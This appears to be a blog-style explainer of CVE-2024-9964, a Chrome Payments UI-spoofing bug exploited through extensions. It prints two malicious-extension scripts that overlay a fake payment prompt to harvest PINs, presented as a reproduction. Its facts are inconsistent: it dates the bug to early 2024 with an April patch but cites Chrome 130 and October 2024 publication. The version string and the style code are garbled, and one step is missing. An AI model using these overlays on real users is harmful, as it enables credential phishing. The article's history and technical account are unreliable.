---

Google Chrome is one of the most secure browsers, but even the best aren’t invincible. In early 2024, a vulnerability tracked as CVE-2024-9964 slipped past defenses. This low-severity bug affected Payments in Chrome versions before 130..6723.58 and opened the door for remote attackers to pull off a sneaky trick: User Interface (UI) spoofing via a specially crafted Chrome Extension.

Below, we'll walk through how this exploit worked, why it mattered, and how you can stay safe. We’ll also show code snippets and reference original sources, so you’re not just taking our word for it.

What Is CVE-2024-9964?

Essentially, this was an inappropriate implementation in the way Chrome handled payment UI elements. If a user installed a malicious browser extension and followed certain clicks or gestures, the attacker could display fake payment screens or prompt windows, tricking users into approving harmful transactions or giving away sensitive info.

It’s important to note: This was not a remote code execution or privilege escalation bug. Exploiting it required social engineering—the attacker needed to get the user to interact with a malicious extension in a certain way.

Step 1: Create a Malicious Extension

The attacker designs a Chrome extension that injects fake payment dialogs or spoofed UI overlays. Here’s how a simplified version might look:

// Contents of background.js in the malicious extension
chrome.action.onClicked.addListener((tab) => {
    chrome.scripting.executeScript({
        target: {tabId: tab.id},
        func: function() {
            const fakeUI = document.createElement('div');
            fakeUI.style.position = 'fixed';
            fakeUI.style.top = '';
            fakeUI.style.left = '';
            fakeUI.style.width = '100vw';
            fakeUI.style.height = '100vh';
            fakeUI.style.background = 'rgba(255,255,255,.95)';
            fakeUI.style.zIndex = 10000;
            fakeUI.innerHTML = `<h2>Authorize Payment</h2>
                                <input type="password" placeholder="Enter your PIN" />
                                <button>Submit</button>`;
            document.body.appendChild(fakeUI);
        }
    });
});

When triggered by user interaction, this code plants a near-perfect overlay on any website, echoing the look and feel of a legit Chrome payment dialog.

Install the extension (often disguised as a game helper, productivity tool, etc.)

- Click on the extension icon and perform certain “gestures” (like confirming a payment or entering credentials)

Step 3: Users See Fake UIs

The crafted overlay collects sensitive data, such as PINs or payment authorization codes, without the user realizing they’re not dealing with the authentic Chrome UI.

How Dangerous Was CVE-2024-9964?

- Severity: Low (Mainly because it needed user interaction and could not escape the browser sandbox)

Timeline and Fix

Google identified the issue and patched it in April 2024.

Chromium Issue Tracker:

https://crbug.com/325424825

Official Release Notes:

Chrome Releases: Stable Channel Update for Desktop (Apr 2024)

NVD Entry:

https://nvd.nist.gov/vuln/detail/CVE-2024-9964

Demonstration: Reproducing the Vulnerability

To show how easy it was to make a spoofed Payments UI, save this code as background.js in a test extension (for educational purposes only):

chrome.runtime.onInstalled.addListener(() => {
    alert("Read the fine print next time!");
});
chrome.action.onClicked.addListener((tab) => {
    chrome.scripting.executeScript({
        target: {tabId: tab.id},
        func: () => {
            let fake = document.createElement('div');
            fake.style = "position:fixed;top:;left:;width:100vw;height:100vh;background:#fff;z-index:9999";
            fake.innerHTML = '<h1>Confirm by entering payment PIN</h1><input type="password">';
            document.body.appendChild(fake);
        }
    });
});

By clicking the extension, the overlay pops up, mimicking a payment prompt. Unsuspecting users might enter their real payment info.

Be wary of unknown extensions: Only install extensions from reputable sources.

- Double-check payment prompts: If something looks off or pops up unexpectedly, close it and start your transaction over.

Final Thoughts

While CVE-2024-9964 never became a major wild exploit, it shows how careful browser makers must be with user interfaces—especially around payments. The next time Chrome nags you to update, remember: you’re not just getting new features, you’re getting a safer browsing experience.

References

- NIST NVD Record for CVE-2024-9964
- Official Chrome Releases
- Original Chromium Bug (may require permission)

Timeline

Published on: 10/15/2024 21:15:12 UTC
Last modified on: 10/17/2024 20:30:09 UTC